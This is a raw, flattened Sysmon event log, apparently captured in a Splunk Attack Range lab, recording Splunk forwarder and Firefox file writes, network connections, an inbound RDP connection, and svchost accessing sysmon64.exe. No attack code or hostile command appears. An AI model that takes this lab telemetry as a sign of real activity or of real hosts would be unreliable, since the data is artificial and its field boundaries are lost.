Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D806F83EA671F66E87B889A61F3E84F,SHA256=D7E1668027CA34E14704F25F35AAF95EBA95E2FCD3372AE3731C17A05FE82546,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.160{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62019-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.159{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62019-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001055786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:17.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CF4CBFB56756F172D84E1EB9C86519,SHA256=1A3D20F12206C27B6BDDE3360260DB81B6B94F623404A577244B5A6C7C9B8EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:17.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A280BB841E64DDDB93DF5490D930058,SHA256=5EE5D63A62785A0D4F36A7928077016C0D455F96CC3C9F196617879EA33E016D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:09.621{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62020-false10.0.1.12-8000- 23542300x80000000000000001055788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:18.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F182050D3C54D037FD635033C04D59,SHA256=7ED359DCCAFE504159F41FAB5E15FFD06AD37DBF43D218E3DEF2BF3324003BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:18.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C6828D6D5E6A63F191E309176A0EF0,SHA256=8461A6D669A2B2A986720622EC57CBCC452CB9342DA42A4EEE236F6818CE7C77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:18.597{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:16.364{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57514-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:19.951{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD647A2B4744D471A563D8E5350A043,SHA256=7C278D1A2ED2D3410D158DAE2C28AF3FC12DB03D9F784285FF350D40AEDDC6F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:19.621{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3412D0176D21312CB037342EBB7D15A,SHA256=8BE164D8D63A874D71E5268747BDD5180EAD086D295E1C5014997EE0F5DA11CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:11.256{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-64287-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:19.065{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A2443A640909930984C6C1CCDED91C00,SHA256=E52F7DBEE3F73CB44A69A27D20060EF1826E67C69A31F2412686A39D3F182B68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.966{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7B24A0D72615EDDD2189E192B107F4E,SHA256=41255CA65A7453E5758EAC2412E38D6CBA60896A1405FABDE6FA231479EF0DA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:20.949{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:20.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BADF3580C7012626DB0B89D75E4903DA,SHA256=B031FBF862F9B6612BAA3214B88E8A2BB1AAF207AE6B1CCBA663D75318CE1F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.182{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5AA4E6E5FF41BDB549FEB49995ECA8BD,SHA256=C9ACEAAB267FF17AE75E218780D5FF677CE46308111853CCAB6DA7E78B03F102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A2EA3EF03F2A9D558CA6B7EB0B920D66,SHA256=6C975BD43F171E7ACF7DA39CB2C9A385735308B0D6F654605BFDCB44489C0D74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7DC5EB766EE31B1C6EF737F284EC4B92,SHA256=1B9A78FB3634B72ACEAD6717A291D8E20997E9FD07808BCDA2D6F5F0CE8BFE24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=53FD997FDE0DF159F970A6E024565C0A,SHA256=105369FE5960ED089E11BC62781C04B14C5C3CB1E65EFCC79DB6C6023EFC0385,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5C326A80E2E3924B6935A07FF29163B2,SHA256=0C943C3DCD6F04CC5BC86E9AA15EBD3B11D8381F68A9A7E11A3C66357F6EF206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE97FB915C2B8B5564948AF626CF5DC3,SHA256=733925BD65F83B0E3C83F8166B674C58974CBB62FD906247B7EEC75C7635CBDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2C9D3EC53BE0687D33D57EBA09BB4018,SHA256=19A3A197BDE3C2172AF6CF8BE97B9E75D2DE8000FAC05F06C50265B61ACE80F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4D3A8FEAE31A93EDCD1FC82A28449FB6,SHA256=C7B863805216415B4B10DE5912946CA172E3EEF2FB2425FDE903560A48F2C1F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CC76704099FE2489F9130A238F87C523,SHA256=348B305A1FB1558A3ADCAEF99C96A9C1CCC927C7CB5720FC173D4C69762A40BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E8E577CCC7362A85930D7660F9076910,SHA256=14637A15621C6219EF0F85B2C5689DC7A83AB0B475518B10EF2C18204B7824B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4302EBED84783A059217B1CB32F89806,SHA256=D3E1FFFADCDE86A5BF94280861604067505F179AB32FA7499D103E46A031F5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:21.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D733440D4F47DA5479CCA05EE0605D,SHA256=A58067DAF7B5D9D765807C2C53B96C0B35C6DB7B874DB454CEE198FD8013E0BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:21.683{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2158F1EF446E7FDBEBD84136D81A5ECB,SHA256=862ADDF7DE94230CE026E97C851E45336745050694B45A8443D0598C4C04E461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:22.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CF707837F542BDA2B43B74F8F4391A,SHA256=E43F07BF56D29CF4AF99AE8DBB7F90AE295DF901BEF0029BC535ACA1FC6BA777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:22.715{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05ADF4DBAD24B6CC0D749EC2DA06B69,SHA256=90158FA1A1E6E6CA4FFBE337A42AB92DBE328C745F8F1E0B43B09059A86FCB89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:21.083{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57515-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001055807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:23.985{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4427F6B4449D0FE5A6F93C893B6794E2,SHA256=B4AAF4C2DFAD7204E3E01A6A77CE823D484F78DAE14565A05732854FED76FD54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:23.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E16259BB03AB47CFBBD10714E4735ECC,SHA256=0C7D45EFB00C158BE1C0DFBD079258D6D14CE876395C18F036348454D7B128BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:15.591{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62021-false10.0.1.12-8000- 354300x8000000000000000811041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:22.286{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57516-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000811069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 